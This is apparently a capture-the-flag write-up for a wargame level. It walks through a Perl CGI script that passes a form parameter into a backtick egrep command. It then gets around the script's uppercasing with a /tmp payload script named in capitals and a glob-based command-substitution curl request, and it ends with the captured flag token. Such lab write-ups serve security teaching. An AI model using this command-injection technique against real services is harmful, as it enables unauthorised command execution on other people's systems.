# cat README
```
level12@BornToSec:~$ cat README
$i=4;$|=@f=map{("!"x$i++)."K$_^\x{0e}"}"BQI!\\","BQI\\","BQI","BQ","B","";push@f,reverse@f[1..5];@f=map{join"",undef,map{chr(ord()-1)}split""}@f;{;$f=shift@f;print$f;push@f,$f;select undef,undef,undef,.25;redo;last;exit;print or die;}
You can try to understand this little script and there is a chance to have this flag..
/!\ If you try to run it make sure you understand all this code ..:) /!\
Or just exploit this single small script on this folder.
This script run on port 4646
```

# let see the script level12.pl
```
level12@BornToSec:~$ cat level12.pl
#!/usr/bin/env perl

use CGI qw{param};

print "Content-type: text/html\n\n";

sub ft_par {
  $first = $_[0];
  $second = $_[1];

  $first =~ tr/a-z/A-Z/;
  $first =~ s/\s.*//;

  @output = `egrep "^$first" /home/flag/flag12/db.txt 2>&1`;

  ...
}
...
ft_start(ft_par(param("first"), param("second")));
```

# like others we can see injectable vuln with userinput
```
@output = `egrep "^$first" /home/flag/flag12/db.txt 2>&1`;
```

# but there are some strings transforme
```
  $first =~ tr/a-z/A-Z/;
  $first =~ s/\s.*//;
```

# so we need to create a script in /tmp
# and call it in the first parameters
# so here the script go
# the name have to be in maj to be find by egrep injection
# because of transforme up here
```
level12@BornToSec:~$ cat /tmp/PAYLOAD
#!/bin/sh
getflag > /tmp/tommy/flag
```

# then we just need to curl the ip with the payload
```
curl --data "first=\`/*/PAYLOAD\`" 127.0.0.1:4646
```

# here you go
```
level12@BornToSec:/tmp/tommy$ ls
flag

level12@BornToSec:/tmp/tommy$ cat flag
Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr
```